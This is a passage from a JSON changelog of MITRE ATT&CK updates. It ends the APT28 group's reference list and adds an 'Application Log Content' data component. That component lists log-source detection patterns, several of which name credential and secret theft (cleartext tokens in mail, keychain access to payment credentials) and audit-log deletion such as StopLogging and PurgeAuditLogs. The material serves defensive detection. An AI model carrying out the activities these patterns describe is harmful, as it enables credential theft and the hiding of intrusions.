                            "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf"
                        },
                        {
                            "source_name": "Sofacy DealersChoice",
                            "description": "Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.",
                            "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/"
                        },
                        {
                            "source_name": "FireEye APT28 January 2017",
                            "description": "FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved November 17, 2024.",
                            "url": "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf"
                        },
                        {
                            "source_name": "FireEye APT28",
                            "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.",
                            "url": "https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf"
                        },
                        {
                            "source_name": "Ars Technica GRU indictment Jul 2018",
                            "description": "Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.",
                            "url": "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/"
                        },
                        {
                            "source_name": "TrendMicro Pawn Storm Dec 2020",
                            "description": "Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm\u2019s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.",
                            "url": "https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html"
                        },
                        {
                            "source_name": "Securelist Sofacy Feb 2018",
                            "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.",
                            "url": "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/"
                        },
                        {
                            "source_name": "Kaspersky Sofacy",
                            "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.",
                            "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/"
                        },
                        {
                            "source_name": "Nearest Neighbor Volexity",
                            "description": "Koessel, Sean. Adair, Steven. Lancaster, Tom. (2024, November 22). The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access. Retrieved February 25, 2025.",
                            "url": "https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/"
                        },
                        {
                            "source_name": "Palo Alto Sofacy 06-2018",
                            "description": "Lee, B., Falcone, R. (2018, June 06). Sofacy Group\u2019s Parallel Attacks. Retrieved June 18, 2018.",
                            "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/"
                        },
                        {
                            "source_name": "Talos Seduploader Oct 2017",
                            "description": "Mercer, W., et al. (2017, October 22). \"Cyber Conflict\" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.",
                            "url": "https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html"
                        },
                        {
                            "source_name": "Microsoft Threat Actor Naming July 2023",
                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
                        },
                        {
                            "source_name": "Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020",
                            "description": "Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.",
                            "url": "https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/"
                        },
                        {
                            "source_name": "Microsoft STRONTIUM Aug 2019",
                            "description": "MSRC Team. (2019, August 5). Corporate IoT \u2013 a path to intrusion. Retrieved August 16, 2019.",
                            "url": "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/"
                        },
                        {
                            "source_name": "DOJ GRU Indictment Jul 2018",
                            "description": "Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved November 17, 2024.",
                            "url": "https://cdn.cnn.com/cnn/2018/images/07/13/gru.indictment.pdf"
                        },
                        {
                            "source_name": "Cybersecurity Advisory GRU Brute Force Campaign July 2021",
                            "description": "NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.",
                            "url": "https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF"
                        },
                        {
                            "source_name": "NSA/FBI Drovorub August 2020",
                            "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.",
                            "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF"
                        },
                        {
                            "source_name": "SecureWorks TG-4127",
                            "description": "SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.",
                            "url": "https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign"
                        },
                        {
                            "source_name": "Secureworks IRON TWILIGHT Active Measures March 2017",
                            "description": "Secureworks CTU. (2017, March 30). IRON TWILIGHT Supports Active Measures. Retrieved February 28, 2022.",
                            "url": "https://www.secureworks.com/research/iron-twilight-supports-active-measures"
                        },
                        {
                            "source_name": "Secureworks IRON TWILIGHT Profile",
                            "description": "Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.",
                            "url": "https://www.secureworks.com/research/threat-profiles/iron-twilight"
                        },
                        {
                            "source_name": "Symantec APT28 Oct 2018",
                            "description": "Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.",
                            "url": "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government"
                        },
                        {
                            "source_name": "Sednit",
                            "description": "This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044).(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018)"
                        },
                        {
                            "source_name": "Sofacy",
                            "description": "This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Drew Church, Splunk",
                        "Emily Ratliff, IBM",
                        "Richard Gold, Digital Shadows",
                        "S\u00e9bastien Ruel, CGI"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "5.3",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-21 13:20:49.866000+00:00\", \"old_value\": \"2025-03-10 20:15:06.958000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"5.3\", \"old_value\": \"5.2\"}}}",
                    "previous_version": "5.2",
                    "version_change": "5.2 \u2192 5.3"
                }
            ],
            "other_version_changes": [],
            "patches": [],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "campaigns": {
            "additions": [],
            "major_version_changes": [],
            "minor_version_changes": [],
            "other_version_changes": [],
            "patches": [],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "assets": {
            "additions": [],
            "major_version_changes": [],
            "minor_version_changes": [],
            "other_version_changes": [],
            "patches": [],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "mitigations": {
            "additions": [],
            "major_version_changes": [],
            "minor_version_changes": [],
            "other_version_changes": [],
            "patches": [],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "datasources": {
            "additions": [],
            "major_version_changes": [],
            "minor_version_changes": [],
            "other_version_changes": [],
            "patches": [],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "datacomponents": {
            "additions": [
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.272000+00:00",
                    "modified": "2026-04-24 19:46:47.171000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0038",
                            "external_id": "DC0038"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Application Log Content",
                    "description": "Application Log Content refers to logs generated by applications or services, providing a record of their activity. These logs may include metrics, errors, performance data, and operational alerts from web, mail, or other applications. These logs are vital for monitoring application behavior and detecting malicious activities or anomalies. Examples: \n\n- Web Application Logs: These logs include information about requests, responses, errors, and security events (e.g., unauthorized access attempts).\n- Email Application Logs: Logs contain metadata about emails sent, received, or blocked (e.g., sender/receiver addresses, message IDs).\n- SaaS Application Logs: Activity logs include user logins, configuration changes, and access to sensitive resources.\n- Cloud Application Logs: Logs detail control plane activities, including API calls, instance modifications, and network changes.\n- System/Application Monitoring Logs: Logs provide insights into application performance, errors, and anomalies.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "android:logcat",
                            "channel": "Default IME active or bound to <pkg> (InputMethodManager reports imeId=<pkg>)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Default IME changed/active: imeId=<pkg>, onStartInput/onFinishInput high frequency. TYPE_APPLICATION_OVERLAY|addView .* showing on top of package <otherPkg>"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Default IME active imeId=<pkg>; frequent onStartInput/commitText calls"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "addView TYPE_APPLICATION_OVERLAY|TYPE_APPLICATION_ATTACHED_DIALOG shown over <target_pkg>"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Secure/Global reads of device_policy_manager, accessibility_enabled, default_vpn, always_on_vpn"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Task switch from browser/custom tab to handler immediately after OAuth return"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "ACTION_OPEN_DOCUMENT_TREE / ACTION_OPEN_DOCUMENT invoked without user gesture or repeatedly in background"
                        },
                        {
                            "name": "Application Log",
                            "channel": "None"
                        },
                        {
                            "name": "Application:Mail",
                            "channel": "smtpd$.*$: .*from=[.*@internaldomain.com](mailto:.*@internaldomain.com) to=[.*@internaldomain.com](mailto:.*@internaldomain.com)"
                        },
                        {
                            "name": "Application:Mail",
                            "channel": "Inbound messages with anomalous headers, spoofed SPF/DKIM failures"
                        },
                        {
                            "name": "Application:Mail",
                            "channel": "Inbound emails containing hyperlinks from suspicious sources"
                        },
                        {
                            "name": "Application:Mail",
                            "channel": "Inbound email attachments logged from MTAs with suspicious metadata"
                        },
                        {
                            "name": "Application:Mail",
                            "channel": "Mismatch between authenticated username and From header in email"
                        },
                        {
                            "name": "Application:Mail",
                            "channel": "High-frequency inbound mail activity to a specific recipient address"
                        },
                        {
                            "name": "ApplicationLog:API",
                            "channel": "Docker/Kubernetes API access from external sources"
                        },
                        {
                            "name": "ApplicationLog:CallRecords",
                            "channel": "Outbound or inbound calls to high-risk or blocklisted numbers"
                        },
                        {
                            "name": "ApplicationLog:EntraIDPortal",
                            "channel": "DeviceRegistration events"
                        },
                        {
                            "name": "ApplicationLog:IIS",
                            "channel": "IIS W3C logs in C:\\inetpub\\logs\\LogFiles\\W3SVC* (spikes in 5xx, RCE/SQLi/path traversal/JNDI patterns)"
                        },
                        {
                            "name": "ApplicationLog:Ingress",
                            "channel": "Kubernetes NGINX/Envoy ingress controller logs with anomalous payloads and 5xx spikes"
                        },
                        {
                            "name": "ApplicationLog:Intune/MDM Logs",
                            "channel": "Enrollment events (e.g., MDMDeviceRegistration)"
                        },
                        {
                            "name": "ApplicationLog:MailServer",
                            "channel": "Unexpected additions of sieve rules or filtering directives"
                        },
                        {
                            "name": "ApplicationLog:Outlook",
                            "channel": "Outlook client-level rule creation actions not consistent with normal user activity"
                        },
                        {
                            "name": "ApplicationLog:WebServer",
                            "channel": "/var/log/httpd/access_log, /var/log/apache2/access.log, /var/log/nginx/access.log with exploit indicators and burst errors"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "SendEmail"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "InvokeModel"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "InvokeFunction: Unexpected or repeated invocation of functions not tied to known workflows"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "CreateUser|AttachRolePolicy|CreateAccessKey|UpdateAssumeRolePolicy|CreateLoginProfile"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "StopLogging, DeleteTrail, UpdateTrail: API calls that disable or modify logging services"
                        },
                        {
                            "name": "AWS:CloudWatch",
                            "channel": "Repeated crash pattern within container or instance logs"
                        },
                        {
                            "name": "AWS:CloudWatch",
                            "channel": "Elevated 5xx response rates in application logs or gateway layer"
                        },
                        {
                            "name": "azure:activity",
                            "channel": "Add role assignment / ElevateAccess / Create service principal"
                        },
                        {
                            "name": "azure:audit",
                            "channel": "App registrations or consent grants by abnormal users or at unusual times"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "ConsentGrant: Suspicious consent grants to non-approved or unknown applications"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Modify Conditional Access Policy"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Register PTA Agent or Modify AD FS trust"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Resource access initiated using application credentials, not user accounts"
                        },
                        {
                            "name": "docker:daemon",
                            "channel": "container_create,container_start"
                        },
                        {
                            "name": "docker:events",
                            "channel": "Container exited with non-zero code repeatedly in short period"
                        },
                        {
                            "name": "docker:runtime",
                            "channel": "execution of cloud CLI tool (e.g., aws, az) inside container"
                        },
                        {
                            "name": "EDR:detection",
                            "channel": "ThreatDetected, QuarantineLog"
                        },
                        {
                            "name": "EDR:detection",
                            "channel": "ThreatLog"
                        },
                        {
                            "name": "esxi:esxupdate",
                            "channel": "/var/log/esxupdate.log contains VIB installed with `--force` or `--no-sig-check` and non-standard acceptance levels"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "/var/log/hostd.log anomalies (faults, crashes, restarts) around inbound connections"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Keywords: 'Backtrace','Signal 11','PANIC','hostd restarted','assert' or 'Service terminated unexpectedly' in /var/log/hostd.log, /var/log/vmkernel.log, /var/log/syslog.log."
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "unexpected script/command invocations via hostd"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Guest Operations API invocation: StartProgramInGuest, ListProcessesInGuest, ListFileInGuest, InitiateFileTransferFromGuest"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "unexpected script invocations producing long encoded strings"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Host daemon command log entries related to vib enumeration"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "New extension/module install with unknown vendor ID"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "vmkernel / OpenSLP logs for malformed requests"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "Symmetric crypto routines triggered for external session"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "ESXi process initiating asymmetric handshake with external host"
                        },
                        {
                            "name": "gcp:workspaceaudit",
                            "channel": "SendAs: Outbound messages with alias identities that differ from primary account"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Repeated or large UIPasteboard reads; background pasteboard access shortly before packaging"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "UIPasteboard read (general/string/data) by <bundle_id>; repeated reads or background access"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "UIWindow/UIView events indicating secure text entry focus, editingChanged bursts, unexpected firstResponder cycling"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Secure text entry focus and editingChanged bursts not typical for the app"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Presentation of credential-like view (UIAlertController with text fields / custom modal) not backed by system auth controller; frequent editingChanged in secureTextEntry fields"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Repeated canOpenURL checks across diverse schemes (\u2265N within short window)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "UIDocumentPickerViewController presented repeatedly without foreground interaction or with short dwell time"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "repeated sandbox denials related to restricted process/system interfaces consistent with process-table querying attempts"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "security-relevant kernel log messages indicating restricted system interface access attempts by app process (device-dependent visibility)"
                        },
                        {
                            "name": "journald:Application",
                            "channel": "Segfault or crash log entry associated with specific application binary"
                        },
                        {
                            "name": "journald:systemd",
                            "channel": "Repeated service restart attempts or unit failures"
                        },
                        {
                            "name": "kubernetes:orchestrator",
                            "channel": "Access to orchestrator logs containing credentials (Docker/Kubernetes logs)"
                        },
                        {
                            "name": "linux:cli",
                            "channel": "cleared or truncated .bash_history"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "usb * new|thunderbolt|pci .* added|block.*: new .* device"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Inbound messages from webmail services containing attachments or URLs"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "kernel|systemd messages indicating 'segmentation fault'|'core dumped'|'service terminated unexpectedly' for sshd, smbd, vsftpd, mysqld, httpd, etc."
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "System daemons initiating encrypted sessions with unexpected destinations"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "milter configuration updated, transport rule initialized, unexpected script execution"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Repetitive HTTP 408, 500, or 503 errors logged within short timeframe"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Application or browser logs (webview errors, plugin enumerations) indicating suspicious script evaluation or plugin loads"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "processes binding to non-standard ports or sshd configured on unexpected port"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "system daemons initiating TLS sessions outside expected services"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "browser/office crash, segfault, abnormal termination"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Error/warning logs from services indicating load spike or worker exhaustion"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "SPF fail OR DKIM fail OR DMARC fail OR mismatched from_domain vs return_path_domain"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "suspicious DHCP lease assignment with unexpected DNS or gateway"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "opened document|clicked link|segfault|abnormal termination|sandbox"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Authentication attempts into finance-related servers from unusual IPs or times"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "sshd sessions with unusual port forwarding parameters"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Non-standard processes negotiating SSL/TLS key exchanges"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Module registration or stacktrace logs indicating segmentation faults or unknown module errors"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Segfaults, kernel oops, or crashes in security software processes"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "Emails containing cleartext secrets (password=, api_key=, token=) shared across internal/external domains"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "Transport Rule Modification"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "Admin Audit Logs, Transport Rules"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "MailDelivery: High-frequency delivery of messages or attachments to a single recipient"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "New-InboxRule: Automation that triggers abnormal forwarding or external link generation"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "MessageTrace logs"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "External sender message followed by user action involving links or attachments"
                        },
                        {
                            "name": "m365:mailboxaudit",
                            "channel": "Outlook rule creation or custom form deployment"
                        },
                        {
                            "name": "m365:messagetrace",
                            "channel": "AuthenticationDetails=fail OR SPF=fail OR DKIM=fail OR DMARC=fail"
                        },
                        {
                            "name": "m365:messagetrace",
                            "channel": "X-MS-Exchange-Organization-AutoForwarded"
                        },
                        {
                            "name": "m365:purview",
                            "channel": "MailItemsAccessed & Exchange Audit"
                        },
                        {
                            "name": "m365:purview",
                            "channel": "MailItemsAccessed, Search-Mailbox events"
                        },
                        {
                            "name": "m365:teams",
                            "channel": "External chat request or new tenant communication preceding approval activity"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Unusual form activity within Outlook client, including load of non-default forms"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "SendOnBehalf, MessageSend, ClickThrough, MailItemsAccessed"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "SendOnBehalf, MessageSend, AttachmentPreviewed"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Send/Receive: Emails with suspicious sender domains, spoofed headers, or anomalous attachment types"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "FileAccessed: Access of email attachments by Office applications"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Creation or modification of inbox rule outside of normal user behavior"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Send/Receive: Inbound emails containing embedded or shortened URLs"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "AppRegistration: Unexpected application registration or OAuth authorization"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "MessageSend, MessageRead, or FileAttached events containing credential-like patterns"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set-Mailbox, Add-InboxRule, RegisterWebhook"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "ConsentGranted: Abuse of application integrations to mint tokens bypassing MFA"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Application Consent grants, new OAuth client registrations, or unusual admin-level activities executed by a user account shortly after suspected drive-by compromise"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Folder configuration updated with external or HTML-formatted Home Page via Set-MailboxFolder"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "PurgeAuditLogs, Remove-MailboxAuditLog"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set-CsOnlineUser or UpdateAuthPolicy"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "New-InboxRule or Set-InboxRule events recorded in Exchange Online"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Transport rule or inbox rule creation events"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "GAL Lookup or Address Book download"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Send/Receive: Inbound emails with attachments from suspicious or spoofed senders"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "certificate added or modified in application credentials"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Unusual MFA requests or OAuth consent events temporally aligned with user-reported vishing call"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set federation settings on domain|Set domain authentication|Add federated identity provider"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "SendOnBehalf/SendAs: Emails sent where the sending identity mismatches account ownership"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set-MailboxAutoReplyConfiguration: Unexpected rule changes creating impersonated replies"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "SendOnBehalf/SendAs: Office Suite initiated messages using impersonated identities"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Read-only configuration review from GUI"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Modify Federation Settings or Update Authentication Policy"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Send/Receive: Unusual spikes in inbound messages to a single recipient"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "PowerShell: Add-MailboxPermission"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Add-MailboxPermission or Set-ManagementRoleAssignment"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set-PartnerOfRecord / CompanyAdministrator role assignments / New-DelegatedAdminRelationship"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Add-DelegatedAdmin, Set-PartnerOfRecord, Add-MailboxPermission, Set-OrganizationRelationship"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "MailSend: Outlook messages with suspicious subject/body terms (e.g., urgent payment, wire transfer) targeting finance teams"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "FileAccessed, FileDownloaded, SearchQueried"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Detection of hidden macro streams or SetHiddenAttribute actions"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "RunMacro"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "FileUploaded or FileCopied events"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "TeamsMessageAccess, TeamsExport, ExternalAppAccess"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "TeamsMessagesAccessedViaEDiscovery, TeamsGraphMessageExport"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "FileAccessed"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "ApplicationModified, ConsentGranted: Unexpected app consent or modification events linked to security evasion"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "MailItemsAccessed; AddedInboxRule; ConsentToApplication; SharingSet"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set-AdminAuditLogConfig;New-ApplicationAccessPolicy;ConsentToApplication"
                        },
                        {
                            "name": "macos:jamf",
                            "channel": "RemoteCommandExecution"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Device attached|enumerated VID/PID"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Inbound email activity with suspicious domains or mismatched sender information"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "App/web server logs ingested via unified logging or filebeat (nginx/apache/node)."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Received messages with embedded or shortened URLs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Received messages containing embedded links or attachments from non-enterprise services"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process 'crashed'|'EXC_BAD_ACCESS' for sshd, screensharingd, httpd; launchd restarts of these daemons."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "opendirectoryd crashes or abnormal authentication errors"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Logs from unifiedlogging that show browser crashes, plugin enumerations, extension installs or errors around the same time as suspicious network fetches"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream cleared or truncated"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "quarantine or AV-related subsystem"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Repeated process crashes logged by CrashReporter or system instability logs in com.apple.console"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Inbound messages with attachments from suspicious domains"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Outgoing or incoming calls with non-standard caller IDs or unusual metadata"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Mail.app or third-party clients sending messages with mismatched From headers"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process crash, abort, code signing violations"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Configuration profile modified or new profile installed"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Crash log entries for a process receiving malformed input or known exploit patterns"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Repetitive inbound email delivery activity logged within a short time window"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Application errors or resource contention from excessive frontend or script invocation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "SPF fail OR DKIM fail OR DMARC fail OR mismatched header vs envelope domains"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "new DHCP configuration with anomalous DNS or router values"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Mail or AppleScript subsystem"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "opened document|clicked link|EXC_BAD_ACCESS|abort|LSQuarantine"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Anomalous keychain access attempts targeting payment credentials"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Abnormal terminations of com.apple.security.* or 3rd-party security daemons"
                        },
                        {
                            "name": "networkdevice:controlplane",
                            "channel": "Syslog from edge devices with HTTP 500s on mgmt portal, SmartInstall events, unexpected CLI commands"
